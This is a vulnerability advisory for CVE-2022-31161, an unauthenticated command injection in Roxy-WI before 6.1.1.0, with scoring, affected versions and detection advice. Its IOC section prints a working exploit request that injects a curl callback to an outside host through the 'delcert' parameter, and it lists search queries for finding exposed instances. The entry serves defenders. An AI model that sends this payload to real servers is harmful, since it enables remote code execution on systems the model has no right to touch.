CVE-2022-31161
published 2022-07-15

Priority: P1 · 84 · critical · CVSS 3.1 base score 9.8
Vector: AV:N / AC:L / PR:N / UI:N / S:U / C:H / I:H / A:H
Tags: ITW · EXPLOIT · VulnCheck KEV
Exploited in the wild
EPSS: 20.45% (97.2th percentile)

Roxy-WI is a Web interface for managing HAProxy, Nginx and Keepalived servers. Prior to version 6.1.1.0, the system command can be run remotely via the subprocess_execute function without processing the inputs received from the user in the /app/options.py file. Version 6.1.1.0 contains a patch for this issue.

Affected (2 ranges)

Vendor     Product    Version range    Fixed in
hap-wi     roxy-wi    < 6.1.1.0        6.1.1.0
roxy-wi    roxy-wi    < 6.1.1.0        6.1.1.0

Detection & IOCs (extracted from sources)

url:      /app/options.py
command:  POST /app/options.py HTTP/1.1
other:    show_versions=1&token=&alert_consumer=notNull&serv=127.0.0.1&delcert=a%20&%20curl%20{{interactsh-url}};
  • Monitor for POST requests to /app/options.py whose 'delcert' parameter contains shell metacharacters (e.g. %20&%20, semicolons); these indicate OS command injection attempts.
  • Alert on unauthenticated POST requests to /app/options.py. The exploit requires no authentication (the token= field is empty), so unauthenticated access to this endpoint is a strong signal.
  • Inventory your own exposed Roxy-WI instances with Shodan/FOFA: Shodan query 'html:"Roxy-WI"' and FOFA query 'body="roxy-wi"'.
  • Look for outbound curl requests originating from the web server process shortly after a POST to /app/options.py, since the payload injects a curl command via the delcert parameter.
  • The vulnerability exists only in Roxy-WI versions prior to 6.1.1.0; version 6.1.1.0 contains the patch. Make version checks part of triage.
  • The exploit is unauthenticated (empty token field), meaning no credentials are required to trigger RCE; detection rules should not filter on authentication state.

CVSS provenance

Source       Version   Score   Severity    Vector
NVD          v3.1      9.8     CRITICAL    CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
VulnCheck              10.0    CRITICAL